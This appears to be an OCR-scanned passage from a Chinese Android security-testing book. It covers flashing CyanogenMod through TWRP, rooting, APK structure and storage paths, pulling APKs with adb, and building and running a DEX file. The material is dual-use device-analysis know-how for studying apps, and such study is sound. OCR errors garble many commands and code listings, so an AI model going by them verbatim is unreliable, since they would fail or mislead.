(4) 选择 菜单 中 的 Wipe 选 项 , 然后 选择 Swipe to Factory Reset 清 除 缓存 、 数 据 和 Dalv 冰 虚拟 机 。 


f Team Win Recovery Project v2.8.7.0 





11:26PM _ Battery: 81% 
Factory Reset 


Wipes Data, Cache, and Dalvik 
(not including internal storage) 


Most of the time this is 
the only wipe that you need. 


Format Data 


Press back button to cancel. 


) Swipe to Factory Reset 
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(5) 你 将 看 到 Factory Reset Complete successful 的 提示 ， 如 下 图 所 示 。 
(人 Team Win Recovery Project v2.8.7.0 
11:28PM Battery: 81% 


Factory Reset Complete 


Successful 





Ypuurang pui tativ Uccuasorse 
. . „done 

Full SELinux support is present. 

Running boot script... 

E:/sbin/runatboot.sh process ended with ERROR=1 


Finished running boot script. 

MTP Enabled 

Formatting Cache using make_ext4fs function. 
Wiping data without wiping /data/media ... 
Done. 

Updating partition details... 

:aone 

Formatting cache using make_ext4fs function. 
Wiping data without wiping /data/media ... 
Done. 

Updating partition details... 

+ „done 





(6) 点 击 Back 按 钮 ， 选 择 Install 选 项 ， 选 中 cm-11-20151004-NIGHTLY-n7100.zip 文 件 ， 如 下 图 
所 示 。 


fj Team Win Recovery Project v2.8.7.0 
11:28PM _ Battery: 81% 
Select Zip to Install 
Storage: Internal Storage (5866 MB) 


/sdcard 


i@ SweetNSpicy Veg 

= TWRP 

i@ viber 

& wallpaper 

@® wdh_update 

柄 WhatsApp 

æ xconstruction 

B cm-11-20151004-NIGHTLY-n7100.zip 


B open_gapps-arm-4.4-nano-20151031.zip 


B Viber messages.zip 
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(7) 选择 ROM 后 ， 将 出 现 如 下 图 所 示 的 界面 。 


f Team Win Recovery Project v2.8.7.0 
11:29PM__Battery: 80% 


This operation may install incompatible 
software and render your device unusable. 
Folder: 
/sdcard 
File to flash: 
m-11-20151004-NIGHTLY-7100.zip 
Press back to cancel adding this zip. 
[Bi Zip file signature verification. 


File 1 of max of 10 


Add More Zips Clear Zip Queue 


> Swipe to Confirm Flash 


(8) 点 击 Swipe to Confirm Flash， 开 始 刷 入 第 三 方 ROM。 








(9) 安装 完成 后 ， 将 会 出 现 如 下 图 所 示 的 Zip Install Complete 提 示 。 点 击 Reboot System 重启 
手机 。 


Cy Team Win Recovery Project v2.8.7.0 
11:30PM Battery: 80% 
Zip Install Complete 


MTP Enabled 

Formatting Cache using make_ext4fs function. 
Wiping data without wiping /data/media ... 
Done. 

Updating partition details... 

. done 

Formatting cache using make_ext4fs function. 
Wiping data without wiping /data/media ... 
Done. 

Updating partition details... 

+ +-done 

Installing '/sdcard/cm-11-20151004-NIGHTLY-n7100.zip 
Checking for MDS file... 

Skipping MDS check: no MDS file found 
Updating partition details... 

.+ -done 


sai 


| 


Successful 


Wipe cache/dalvik Reboot System 
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(10) 手机 开机 后 ， 将 会 出 现 如 下 图 所 示 的 CyanogenMod 界 面 。 





= 


cyanogenmod 





(11) 然后 会 出 现 熟 悉 的 安 卓 系统 ， 你 可 以 根据 个 人 喜好 设置 系统 。 如 果 想 要 使 用 谷歌 Play 商 
店 ， 可 以 按照 刚才 介绍 的 步骤 下 载 并 安装 它 。 如 果 想 要 安装 GAPPS, 重新 确认 一 下 你 是 否 安装 了 
最 新 版 的 SuperSU。 最 后 ， 你 的 手机 界面 将 会 如 下 图 所 示 。 可 以 从 下 面 的 链接 中 下 载 GAPPS : 
http://opengapps.org/?api=4.4&variant=nano 。 








an 
As 


Apollo Calculator 


$ 


Camera Downloads 


pa 


File Manager Gallery 
<= 


IIIT 


Google Settings Messaging Movie Studio 


Phone INFO Play Store 


D €'> 


SIM Toolkit Sound Recorder SuperSU 


Terminal Emula.. 


e. 

















(12) 使 用 USB 数 据 线 将 设备 连接 到 计算 机 上 ， 检 查 你 是 否 能 以 root 用 户 的 身份 登录 。 
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这 一 节 主 要 介绍 了 如 何 安装 recovery 软 件 TWRP, 如 何 使 用 TWRP 来 ROOT 安 卓 设备 ， 以 及 如 
何在 智能 手机 上 安装 第 三 方 ROM。 


其 他 手机 的 操作 过 程 也 基本 类 似 ， 但 是 ， 务 必 确 保 你 使 用 了 正确 版 本 的 CM 和 TWRPT。 























2.7 小 结 


本 章 介绍 了 锁定 和 解锁 boot loader 的 概念 以 及 解锁 boot loader 的 方法 ， 并 讨论 了 ROOT 及 其 利 
次 ， 其 中 包括 在 进行 安全 分 析 时 ，ROOT 能 让 我 们 访问 所 有 的 数据 。 一 旦 ROOTT 了 一 台 设 备 ， 我 
们 就 拥有 了 访问 设备 文件 系统 的 全 部 权限 , 不 仅 能 探索 系统 内 部 , 还 能 访问 设备 上 其 他 应 用 的 数 
据 。 在 后 面 的 章节 中 ， 我 们 将 对 此 进行 深入 研究 。 最 后 ， 我 们 还 讨论 了 如 何 ROOT 设 备 ， 以 及 如 
何在 安 卓 设备 上 安装 第 三 方 ROM。 











安 早 应 用 的 基本 构造 























本 章 主要 介绍 安 卓 应 用 的 内 部 构造 。 应 用 底层 是 如 何 构造 的 , 当 被 安装 到 设备 上 时 是 什么 样 
子 ， 又 是 如 何 运行 的 等 ， 了解 这 些 知 识 十 分 重要 。 在 其 他 章节 讨论 诸如 逆向 工程 和 安 草 应 用 渗透 
测试 时 ， 我 们 将 会 用 到 这 些 知 识 。 


本 章 包含 以 下 主要 内 容 。 


O 安 草 应 用 的 基础 知识 

口 应 用 的 构建 过 程 

O 安 草 应 用 在 安 卓 设备 上 的 运行 原理 
口 Dalv 让 虚拟 机 和 安 旨 运行 时 

口 安 草 应 用 的 基本 构造 














3.1 安 卓 应 用 的 基础 知识 


我 们 从 谷歌 Play 商 店 或 者 其 他 地 方 下 载 并 安装 的 每 一 个 安 卓 应 用 都 是 以 .apk 作 为 文件 后 缀 
的 。 这 些 APK 文 件 都 是 压缩 存档 文件 ， 其 中 包含 了 一 些 其 他 的 文件 和 文件 夹 ， 稍 后 我 们 会 介绍 。 
通常 ,终端 用 户 下 载 这 些 应 用 之 后 ,通过 接受 其 所 需 的 权限 请 求 ， 就 可 以 安装 并 使 用 它们 了 。 下 
面 我 们 来 深入 探讨 一 些 技术 细节 ， 比 如 这 些 应 用 是 由 什么 组 成 的 , 它们 是 如 何 打 包 的 ,以 及 安装 
过 程 发 生 了 什么 ， 等 等 。 




















3.1.1 安 卓 应 用 的 结构 


首先 从 终端 用 户 使 用 的 二 进 制 文件 开始 。 前 文 曾 提 到 过 ， 安 卓 应 用 的 扩展 名 为 .APK 
( Android Application Package 的 缩写 ), 它 是 一 个 包含 多 个 文件 和 文件 夹 的 数据 存档 文件 。 终端 
用 户 或 者 渗透 测试 工程 师 通常 获 得 的 就 是 这 种 文件 。 既 然 安 章 应 用 是 一 种 存档 文件 ,那么 我 们 
就 可 以 使 用 传统 的 文件 提取 工具 解压 它 。 下 图 是 APK 文 件 解 压 后 的 目录 结构 。 通 常情 况 下 ， 所 
有 APK 文 件 都 与 此 类 似 ， 只 在 一 些 细微 的 地 方 存在 差异 。 比 如 ， 应 用 如 果 包 含 额外 的 库 , 会 比 
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这 个 结构 多 出 一 个 lib 文 件 夹 。 


Android Package (.apk) 


classes.dex resources.arsc 


assets META-INF 


AndroidManifest.xml 








解压 APK 文 件 的 步骤 如 下 。 
(1) 把 文件 扩展 名 .apk 改 成 .zip。 
(2) 在 Linux 或 Mac 系 统 中 ， 使 用 下 面 的 命令 解压 文件 : 


Unzip filename.zip 


在 Windows 系 统 中 ， 可 以 使 用 7-Zip、WinRAR 或 者 其 他 类 似 的 工具 来 解压 文件 。 
我 们 来 看 一 下 每 个 文件 或 者 文件 夹 都 包含 了 哪些 内 容 。 
自 


口 AndroidManifest.xml: 包含 应 用 的 大 部 分 配置 信息 、 

用 所 需 权限 ， 等 等 。 

口 classes.dex: 包含 由 开发 人 员 编 写 的 源 代 码 生 成 的 Dalv 站 字 节 码 ， 以 及 应 用 在 设备 上 运行 
时 所 执行 的 内 容 。 在 本 章 后 面 的 一 节 中 ， 我 们 将 介绍 如 何 手 动 生成 这 个 DEX 文 件 ， 并 在 
安 章 设备 上 执行 它 。 

口 resources.arsc: 包含 编译 过 的 资源 。 

O Res: 包含 应 用 所 需 的 原始 资源 ， 比 如 应 用 图 标 等 图 片 。 

口 Assets: 用 于 存放 开发 人 员 感 兴趣 的 音乐 、 视 频 、 预 置 的 数据 库 等 文件 ， 这 些 文件 会 与 应 

用 绑 定 。 

口 META-INF: 用 于 存放 应 用 签名 和 应 用 所 用 到 的 所 有 文件 的 SHA1 摘 要 。 


如 何 获取 APK 文 件 
如 果 想 获得 特定 的 APK 文 件 ， 可 以 按照 下 面 的 方法 来 获取 。 
口 从 谷歌 Play 商店 下 载 APK 文 件 。 











包 名 、 应 用 组 件 、 组 件 安 全 设置 、 应 
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m 如果 你 想 从 谷歌 Play 商 店 下 载 一 个 APK 文 件 ， 只 需要 将 应 用 在 谷歌 Play 商 店 的 完整 网 址 
复制 到 下 面 的 网 站 , 就 能 获取 该 应 用 的 APK 文 件 : http://apps.evozi.com/apk-downloader/。 


口 从 设备 上 提取 APK 文 件 。 
如 果 你 的 设备 已 经 安装 了 这 个 应 用 ， 只 需要 使 用 几 个 aqb 命 令 就 能 提取 APK 文 件 。 


3.1.2 APK 文件 的 存储 位 置 


根据 应 用 是 由 谁 安装 的 以 及 安装 过 程 中 选择 了 哪些 额外 选项 , 应 用 在 安 草 设备 上 有 多 个 存储 
路 径 。 我 们 来 一 一 了 解 它们 。 












































1. /data/app/ 


用 户 安装 的 应 用 会 存放 在 这 个 位 置 ， 我 们 来 看 一 下 安装 在 这 个 文件 夹 中 的 应 用 的 文件 权限 。 
下 面 的 代码 表明 这 里 的 所 有 文件 都 是 全 局 可 读 的 ,任何 人 都 可 以 复制 它 , 而 且 不 需要 额外 的 权限 。 
root@android:/data/app # 1s -1 


-rw-r--r-- system system 11586584 1981-07-11 12:37 OfficeSuitePro_SE_ 
Viewer .apk 











-rw-r--r-- system system 252627 1981-07-11 12:37 
PlayNowClientArvato.apk 


-rw-r--r-- system system 14686076 2015-11-14 02:28 com.android. 
vending-1.apk 


-rw-r--r-- system system 5949763 2015-11-13 17:39 com.estrongs. 
android.pop-1.apk 


-rw-r--r-- system system 39060930 2015-11-14 02:32 com.google. 
android.gms-2.apk 


N 


-rw-r--r-- system system 677200 1981-07-11 12:37 neoreader.apk 


-rw-r--r-- system system 4378733 2015-11-13 15:22 si.modula.android. 
instantheartrate-1.apk 


-rw-r--r-- system system 5656443 1981-07-11 12:37 trackid.apk 


root@android:/data/app # 


上 面 的 代码 显示 /data/app/ 文 件 夹 中 的 APK 文 件 是 全 局 可 读 的 。 





2./system/app/ 


系统 镜像 自 带 的 应 用 会 存放 在 这 个 位 置 ， 我 们 来 查看 安装 在 这 个 文件 夹 中 的 应 用 的 文件 权 
限 。 下 面 的 代码 表明 所 有 的 文件 都 是 全 局 可 读 的 , 任何 人 都 可 以 将 其 复制 出 来 ,而 且 不 需要 额外 
的 权限 。 
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root@android:/system/app # 1s -1 * .apk 


-rw-r--r-- root root 1147434 2013-02-01 01:52 ATSFunctionTest. 
apk 

-rw-r--r-- root root 4675 2013-02-01 01:52 
AccessoryKeyDispatcher.apk 

-rw-r--r-- root root 51595 2013-02-01 01:52 AddWidget.apk 
-rw-r--r-- root root 21568 2013-02-01 01:52 
ApplicationsProvider.apk 

-rw-r--r-- root root 2856 2013-02-01 01:52 ArimaIllumination. 
apk 

-rw-r--r-- root root 7372 2013-02-01 01:52 
AudioEffectService.apk 

-rw-r--r-- root root 147655 2013-02-01 01:52 
BackupRestoreConfirmation.apk 

-rw-r--r-- root root 619609 2013-02-01 01:52 Bluetooth.apk 
-rw-r--r-- root root 5735427 2013-02-01 01:52 Books.apk 
-rw-r--r-- root root 2441128 2013-02-01 01:52 Browser.apk 
-rw-r--r-- root root 11847 2013-02-01 01:52 CABLService.apk 
-rw-r--r-- root root 200199 2013-02-01 01:52 Calculator.apk 
-rw-r--r-- root root 92263 2013-02-01 01:52 CalendarProvider. 
apk 

-rw-r--r-- root root 3345 2013-02-01 01:52 
CameraExtensionPermission.apk 

-rw-r--r-- root root 141003 2013-02-01 01:52 CertInstaller.apk 
-rw-r--r-- root root 215780 2013-02-01 01:52 
ChromeBookmarksSyncAdapter.apk 

-rw-r--r-- root root 7645090 2013-02-01 01:52 ChromeWithBrowser. 
apk 

-rw-r--r-- root root 1034453 2013-02-01 01:52 ClockWidgets.apk 
-rw-r--r-- root root 1213839 2013-02-01 01:52 ContactsImport.apk 
-rw-r--r-- root root 2100200 2013-02-01 01:52 Conversations.apk 
-rw-r--r-- root root 182403 2013-02-01 01:52 
CredentialManagerService.apk 

-rw-r--r-- root root 12255 2013-02-01 01:52 
CustomizationProvider.apk 

-rw-r--r-- root root 18081 2013-02-01 01:52 
CustomizedApplicationInstaller.apk 

-rw-r--r-- root root 66178 2013-02-01 01:52 
CustomizedSettings.apk 

-rw-r--r-- root root 11816 2013-02-01 01:52 
DefaultCapabilities.apk 

-rw-r--r-- root root 10989 2013-02-01 01:52 
DefaultContainerService.apk 

-rw-r--r-- root root 731338 2013-02-01 01:52 DeskClockGoogle. 
apk 


3. /data/app-private/ 


设备 上 禁止 复制 的 应 用 通常 都 存放 在 这 个 文件 夹 中 。 没有 足够 权限 的 用 户 无 法 复制 安装 在 这 
个 文件 夹 中 的 应 用 。 但 是 ， 如 果 拥 有 设备 的 root 权 限 ， 我 们 就 能 提取 这 些 APK 文 件 。 
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下 面 介绍 如 何 从 设备 上 提取 特定 的 应 用 。 提 取 过 程 分 三 步 : 
(1) 找到 应 用 包 名 ; 

(2) 找到 APK 文 件 在 设备 上 的 存储 路 径 ; 

(3) 从 设备 上 拉 取 APK 文 件 。 

我 们 来 实际 操作 一 下 。 下 面 的 示例 是 在 一 台 运 行 
o 示例 : 时 出 预 装 应 用 

如 果 知 道 应 用 的 名 称 ， 可 以 使 用 下 面 的 命令 找到 应 用 包 名 。 














卓 4.1.1 系 统 的 真实 的 安 卓 设备 上 演示 的 。 


if 














adb shell -d pm list packages | find "your app" 


C:\>adb -d shell pm list packages i find “mail” 
package -com.android.emai 


C:\> 





如 上 图 所 示 ， 它 会 显示 包 名 。 


接 下 来 ,我 们 需要 找到 包 名 所 对 应 的 APK 文 件 的 路 径 。 同 样 ,我 们 可 以 使 用 下 面 的 命令 来 获 
取 路 径 。 


adb -d shell pm path [ 包 名 ] 








C:N>adhb -d shell pm path com.android.email 
package -/system/app/SemcEmail.apk 


C:、\> 


不 出 所 料 ， 由 于 这 是 一 个 预 装 应 用 ,所 以 它 存放 在 /system/app/ 目 录 下 。 最 后 一 步 是 将 它 从 设 
备 中 拉 取 出 来 。 同 样 ， 我 们 可 以 使 用 下 面 的 命令 将 APK 文 件 拉 取 出 来 。 


adb -d pull /system/app/ [file.apk] 


























C=\>adb -d pull “system/app/SencEmail. apk 
2285 KB/s (3661800 bytes in 1.564s> 





C:\> 
o 示例 : 导出 用 户 安装 的 应 用 


和 导出 预 装 应 用 的 操作 类 似 , 如 果 知 道 应 用 的 名 称 , 就 可 以 使 用 下 面 的 命令 来 找 出 用 户 安装 
的 应 用 的 包 和 名 。 





adb shell -d pm list packages | find "your app" 


这 次 ， 我 要 找 的 是 一 款 从 谷歌 Play 商店 安装 的 heartrate 应 用 。 如 果 你 想 在 自己 的 设备 上 安装 
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这 款 应 用 ,可 以 从 下 面 的 链接 下 载 : https://play.google.com/store/apps/details?id=si.modula.android. 
instantheartrate&hl=en. 


C:\>adb -d shell pm list packages i find “heartrate” 
package -si.modula.android.instantheartrate 


C:、\> 


如 上 图 所 示 ， 我们 已 经 找到 了 应 用 的 包 名 。 可 以 使 用 下 面 的 命令 查找 APK 文 件 的 路 径 。 


adb -d shell pm path [ 包 名 ] 








C:\>adb -d shell pm path si.modula.android.instantheartrate 
package :-/data/app/si.modula.android.instantheartrate-—1.apk 





C:N\> 


由 于 这 款 应 用 是 由 用 户 安装 的 ， 所 以 APK 文 件 位 于 /data/app/ 目 录 下 。 





























最 后 ， 我 们 可 以 使 用 下 面 的 命令 来 导出 该 应 用 ， 这 和 前 面 导 出 预 装 应 用 的 方法 类 似 。 


adb -d pull /data/app/ [file.apk] 





| 








C:\>Dadb -d pull /data/app/si.modula.android.instantheartrate-1.apk 
2365 KB/s (4378733 bytes in 1.807s> 


C:\> 


如 果 使 用 adb shell 浏 览 /system/app/ 文 件 夹 ， 你 会 发 现 除了 APK 文 件 外 ,还 有 一 些 .odex 格 式 的 
文件 。 这 些 .odex 文 件 其 实 是 经 过 优化 的 .dex 文 件 ， 应 用 第 一 次 运行 时 通常 会 创建 它们 。 在 系统 内 
部 ，dexopt 工 具 负 责 创建 这 些 文件 。 这 一 过 程 通 常 是 在 安 卓 系统 第 一 次 启动 时 完成 的 ， 能 够 提升 
应 用 性 能 。 


当 你 在 最 新 版 的 安 卓 设备 上 进行 上 述 操作 时 , APK 文 件 的 位 置 可 能 会 和 我 们 在 这 里 看 到 的 稍 
有 不 同 。 下 图 是 进行 此 项 测试 的 模拟 器 的 规格 参数 。 


€ About phone 


System updates 












































Status 


Phone number, signal, etc 
Legal information 


Model number 


Android SDK built for x86 


Android version 
6.0 


Baseband version 
Unknown 
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用 户 安 装 的 应 用 和 预 装 应 用 的 APK 文 件 分 别 存储 在 /data/app/ 和 /systemy/app/ 目 录 下 各 自 的 文 
件 夹 中 。 


预 装 应 用 的 存储 位 置 如 下 图 所 示 。 














C:\>adb -e shell pm list packages i find “mail” 


package -com.android.emai 


C:\>adb -e shell pm path com.android.email 
package :/system/app/Email/Email.apk 





C:、\> 


用 户 安装 的 应 用 的 存储 位 置 如 下 图 所 示 。 








C:\>adb -e shell pm path com.android.smoketest 
package :/data/app/SmokeTestApp/SmokeTestfApp.apk 





C:\> 


在 本 例 中 ， 如 果 使 用 adb shel1 浏 览 文件 系统 ， 你 会 发 现 每 一 个 应 用 的 .odex 文 件 都 存放 在 




















各 自 的 文件 夹 中 ， 而 不 是 在 /system/app/ 中 。 


3.2” 安 卓 应 用 的 组 件 
安 卓 应 用 通常 都 会 包含 如 下 全 部 或 部 分 组 件 。 








DD activity 

口 服务 

o 广播 接收 需 
O 内 容 提供 程序 





3.2.1 activity 


activity 为 用 户 提供 了 一 个 可 以 通过 与 之 交互 来 完成 某 些 操作 的 界面 。 有 时 ，activity 会 包含 多 
个 fragment。fragment 表 示 activity 中 的 一 个 行为 或 用 户 界 面 的 一 部 分 。 用 户 可 以 在 activity 中 进行 
打 电 话 、 发 短信 等 操作 。Facebook 应 用 的 登录 界面 就 是 activity 的 一 个 很 好 的 例子 。 下 面 是 计算 需 
应 用 的 activity 截 图 。 
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3.2.2 ”服务 
服务 可 以 在 后 台 长 时 间 运 行 ， 而 且 不 提供 用 户 界面 。 以 音乐 应 用 为 例 ， 当 选 好 歌曲 后 ,你 可 
以 关闭 它 的 所 有 界面 ， 它 能 在 后 台 正 常 播放 歌曲 。 下 图 显示 了 我 的 设备 上 正在 运行 的 服务 。 
ra ç Wm 07:24 
六 Apps SHOW CACHED PROCESSES 
NTERNAL RUNNING 


Maps 6.1MB 


Process: 1, service:1 360:31:01 


SecureClockService 


Process: 1, service:1 


Smart Connect 5.2MB 


Process: 1, service:1 361:00:00 


Top contacts 3.9MB 


Process: 1, service:1 01:12 


Xperia™ keyboard 9.1MB 


Process: 1, service:1 361:00:39 


RAM 
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3.2.3 ”广播 接收 器 


广播 接收 器 是 一 个 能 在 设备 系统 中 接收 广播 通知 的 组 件 。 它 能 接收 诸如 低 电 量 、 启 动 完 成 、 
耳机 连接 等 消息 。 虽 然 大 部 分 广播 事件 都 是 由 系统 发 起 的 , 但 是 应 用 也 可 以 发 出 广播 。 从 开发 人 
员 的 角度 来 说 ， 当 应 用 需要 针对 特定 的 事件 做 出 反应 时 ， 就 可 以 使 用 广播 接收 器 。 











3.2.4 内 容 提 供 程序 


内 容 提供 程序 以 一 个 或 多 个 表格 的 形式 为 外 部 应 用 提供 数据 。 如 果 应 用 需要 与 其 他 应 用 共享 
数据 ,内 容 提供 程序 就 是 一 种 方法 ,， 它 可 以 充当 应 用 间 的 数据 共享 接口 。 内 容 提供 程序 使 用 标准 
的 insert() 、query() 、update() delete () 等 方法 来 获取 应 用 数据 。 所 有 的 内 容 提供 程序 
都 使 用 content:/ 开 头 的 特殊 格式 的 URI。 只 要 知道 这 个 URI 并 拥有 合适 的 权限 ， 任 何 应 用 都 可 以 
从 内 容 提 供 程序 的 数据 库 中 进行 数据 插入 、 更 新 、 删 除 和 查询 等 操作 。 


例如 , 通过 使 用 content:/sms/inbox 内 容 提供 程序 ,任何 应 用 都 可 以 从 内 置 的 短信 应 用 的 数据 
仓库 中 读 取 短信 ， 前 提 是 应 用 需 在 AndroidManifestxml 文 件 中 声明 *READ_SMS 权 限 。 



































内 容 提供 程序 


insert () 


update () 


delete () 














3.25 ” 安 卓 应 用 的 构建 过 程 
上 文 只 介绍 了 APK 文 件 的 相关 内 容 。 了 解 APK 文 件 在 屏幕 后 是 如 何 创建 的 尤为 重要 。 当 开发 
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B 














人 员 使 用 Android Studio 之 类 的 IDE 构 建 应 用 时 ， 通常 是 在 一 个 较 高 的 层面 进行 了 下 面 的 操作 。 


如 前 文 所 述 ， 安 卓 项 目 通常 包含 Java 源 代码 ( 它 被 编译 成 了 classes.dex 文 件 )、 二 进 制版 本 的 
AndroidManifestxml， 以 及 其 他 在 编译 和 打包 过 程 中 被 绑 定 到 一 起 的 资源 。 当 项 目 完成 后 ， 应 用 
还 需要 开发 人 员 对 其 进行 签名 ， 然 后 才能 在 设备 上 安装 和 运行 。 
虽然 从 开发 人 员 的 角度 来 看 ， 上 述 过 程 很 简单 , 但 背后 包含 了 一 系列 繁杂 的 处 理 操作 。 下 面 
介绍 整个 应 用 构建 系统 是 如 何 工作 的 。 


根据 谷歌 的 官方 文档 ， 下 图 是 应 用 构建 系统 的 完整 过 程 。 







































































第 三 方 库 和 
class ff: 





debug 或 
release 签 名 
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(1) 构建 过 程 的 第 一 步 是 编译 资源 文件 ， 如 AndroidManifest.xml 和 用 于 构建 UI 布局 的 XML 文 
件 等 。 这 一 过 程 使 用 了 aapt ( Android Asset Packaging Tool， 安 卓 资 源 打包 工具 )， 它 会 生成 一 个 
R.java 文 件 ， 该 文件 包含 Java 代 码 中 可 以 引用 的 一 些 常量 。 











package com.test.helloworld; 


public final class R { 
public static Final class anim { 





public 
public 
public 
public 
public 


static 
static 
static 
static 
static 


final i 
Final i 
Final i 





final i 
Final i 





t=0x72050004; 





public static final i | bottom=0x7£050005; 











(2) 如 果 项 目 使 用 了 .aidl ( Android Interface Definition Language， 安 卓 接 口 定义 语言 ) 文件 ， 
aidl 工 具 会 将 其 转换 为 .java 文件 。 通 常 ， 当 我 们 允许 来 自 不 同 应 用 的 客户 端 访问 服务 并 进行 进程 
间 通 信 (IPC )， 以 及 在 服务 中 处 理 多 线程 时 ， 就 会 用 到 AIDL 文 件 。 


(3) 现在 , 我 们 已 经 准备 好 了 所 有 的 Java 文 件 , 并 且 可 以 使 用 Java 编 译 器 进行 编译 。javac 是 用 
于 编译 Java 文 件 的 工具 ， 可 以 将 Java 文 件 编译 成 .class 文 件 。 


(4) 所 有 的 class 文件 都 需要 转换 为 .dex 文 件 ， 这 一 步 可 以 使 用 dx 工具 来 完成 。 最 终生 成 一 个 
名 为 classes.dex 的 DEX 文 件 。 

(5) 上 一 步 中 生成 的 classes.dex 文 件 、 图 片 等 尚未 编译 的 资源 以 及 其 他 已 编译 的 资源 会 被 发 送 
到 Apk Builder 工 具 ， 它 会 将 这 些 文件 打包 成 一 个 APK 文 件 。 

(6) 想 要 将 这 个 APK 文 件 安装 到 安 卓 设备 或 者 模拟 器 上 ， 还 需要 使 用 debug key 或 release key 
对 其 进行 签名 。 在 开发 阶段 ，IDE 出 于 测试 目的 会 使 用 debug key 对 应 用 进行 签名 。 签 名 过 程 可 以 
通过 命令 行使 用 Java Keytool 和 jarsigner 来 手动 完成 。 

(7) 当 应 用 已 经 准备 正式 发 布 之 后 ， 还 需要 给 它 签 上 release key。 在 应 用 签 上 了 release key 之 
后 ， 还 必须 使 用 zipalign 工 具 对 其 进行 对 齐 人 处理 ， 以 便 优化 应 用 在 设备 上 运行 时 的 内 存 占用 。 


参考 资料 : http://developer.android.com/sdk/installing/studio-build.html。 
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3.3 ”从 命令 行 编译 DEX 文件 


HRA, DEX 文 件 是 安 卓 应 用 最 重要 的 组 成 部 分 之 一 , 在 对 应 用 进行 攻击 或 渗透 测试 时 通 
常 发 挥 着 重要 作用 。 在 本 书后 面 讲解 逆向 工程 时 ,我 们 会 频繁 使 用 DEX 文 件 。 因 此 ,我 们 来 看 一 
下 在 应 用 构建 过 程 中 ， DEX 文 件 是 如 何 创 建 的 。 为 了 更 好 地 理解 这 一 过 程 ， 我 们 将 使 用 命令 行 
来 仔细 观察 每 一 步 操 作 。 


下 图 显示 了 生成 .dex 文 件 的 主要 流程 。 






































javac 编 译 器 











dx 工具 








首先 ， 我 们 首先 编写 一 个 简单 的 Java 程 序 。 下 面 这 段 Java 代 码 仅 用 于 在 输出 控制 台 打 印 
“Hacking Android” 。 
public class HackingAndroid{ 
Public static void main(String[] args) { 


System.out.printin("Hacking Android"); 


} 

} 

将 这 个 文件 保存 为 HackingAndroid.java。 

下 面 来 编译 这 个 Java 文 件 。 安 卓 Java 代 码 的 初始 编译 与 传统 Java 文 件 的 编译 类 似 。 这 里 ,我 
们 使 用 javac 编 译 器 。 


运行 下 面 的 命令 编译 Java 文 件 。 





























javac [文件 名 .java] 


C:\Program Files\Java\jdk1.6.@19\bin>javac Hackingfndroid. java 


C:\Program Files\Java\jdki .6.6_19\bin> 
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NSS 请 使 用 JDK 1.6 来 编译 Java 文 件 ， 因 为 更 高 版 本 的 JDK 生 成 的 .class 文 件 与 下 
一 步 中 用 到 的 dx 工具 不 兼容 。 





上 一 步 生 成 了 一 个 .class 文 件 ， 该 文件 通常 包含 标准 的 JVM 字 节 码 。 下 面 的 代码 展示 了 这 
个 .class 文 件 是 如 何 被 拆 解 的 。 


public class HackingAndroid extends java.lang.Object { 
public HackingAndroid(); 





Code: 
0: aload_0 
Ta invokespecial #1; //Method java/lang/Object."<init>":()V 
4: return 
public static void main(java.lang.String[]); 
Code: 
QO: getstatic #2; //Field 
java/lang/System.out:Ljava/io/PrintStream; 
3: ldc #3; //String Hacking Android 
Diz invokevirtual #4; //Method 
java/io/PrintStream.printin: (Ljava/lang/String;)V 
8: return 


} 
我 们 可 以 使 用 下 面 的 命令 来 运行 这 些 .class 文 件 。 


java [类 名 ] 


C:\Program Files\Java\jdk1.6.6_19\bin>java Hackingûndroid 
Hacking Android 


C:\Program Files\Java\jdk1i .6.6_19\bin> 








在 上 图 中 可 以 看 到 ， 输 出 控制 台 打 印 了 Hacking Android. 


但 是 ， class 文 件 并 不 能 直接 在 安 卓 设备 上 运行 ， 因 为 安 卓 系统 拥有 自己 的 字 节 码 格式 ， 
即 Dalv 永 。 这 些 是 安 卓 系统 的 机 器 码 指 令 。 


所 以 , 下面 需 要 将 这 个 .class 文 件 转换 为 DEX 文 件 , 我 们 可 以 使 用 dx 工具 来 完成 这 一 步 。 我 
的 计算 机 已 经 设置 好 了 dx 工具 的 路 径 ， 你 可 以 在 安 卓 SDK 路 径 下 的 build tools 文 件 夹 中 找到 它 。 


运行 下 面 的 命令 从 上 述 .class 文 件 中 生成 DEX 文 件 。 


dx -dex -output=[file.dex] [file.class] 























C:\Program Files\Java\ jdki .6.6_19\bin>dx -—-dex —-output=Hackingfndroid.dex Hacki 
ngAndroid.class 


C:\Program Files\Java\jdki .6.@_19\bin> 





现在 应 该 已 经 生成 了 DEX 文 件 ， 下 图 显示 了 用 十 六 进 制 编辑 需 打 开 的 DEX 文 件 。 
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Cex 5 seit Hie te Sol ote wie a A eel a EN e p. 

EVid aa TN N 和 
Cn Eh ee E L E E E ATE O...w. 
E oe deat ane easleas acts ane 
LE EE E E EE E A ae ae i S 
PAT aa onsa aan aar a a a aR E AA E 
etn See aura eth gota a eo gee eeu gt | ere ears 
gosh pence i ae Deedee we Bier e ate eee aoe 

aR et ease TS eee at ea ae tenders Ral <init 


. Hacking Android. .HackingAndroid. jay 
.LHackingAndroid;..Ljava“io-Printstr 
Do eet ei vec 
tring;..Ljava“lang-System:;..¥..VL..[L] 
ava“lang“String;..main..aut..printin.. 

















现在 一 切 准 备 就 绪 ， 我 们 可 以 在 安 卓 模拟 器 上 运行 这 个 文件 。 将 这 个 文件 存储 在 /datallocaltmpy/ 
目录 下 ， 并 运行 它 。 


运行 下 面 的 命令 ， 将 这 个 文件 上 传 到 模拟 器 


adb push HackingAndroid.dex /data/local/tmp 


C:\Program Files\Java\jdki1.6.6_19\bin>adb push Hackingfndroid.dex /data/local/tn| 
p 
13 KB/s (756 bytes in @.854s» 





C:\Program Files\Java\jdki .6.@_19\bin> 





我 们 看 到 文件 已 经 被 推送 到 设备 上 了 。 





























我 们 可 以 通过 命令 行使 用 dalvikvm 来 运行 这 个 文件 , 或 者 在 你 的 计算 机 上 使 用 下 面 的 命令 来 
文件 ， 也 可 以 打开 设备 上 的 shell， 找 到 存放 这 个 DEX 文 件 的 文件 来 ， 然 后 运行 它 。 


运 和 


adb shell dalvikvm -cp [path to dex file] [类 名 ] 


C:\>adb shell dalvikum -cp /data/local/tmp/Hackingfndroid.dex HackingAndroid 
Hacking Android 


C:\> 





3.4 应 用 运行 时 发 生 了 什么 


安 卓 系统 启动 后 ，Zygote 进 程 也 会 随 之 启动 ， 它 会 监听 新 应 用 的 启动 请 求 。 当 用 户 点 击 一 个 
应 用 时 ， 会 通过 Zygote 月 动 该 应 用 。Zygote 收 到 启动 新 应 用 的 请 求 后 ， 会 使 用 fork 系 统 调用 来 创 
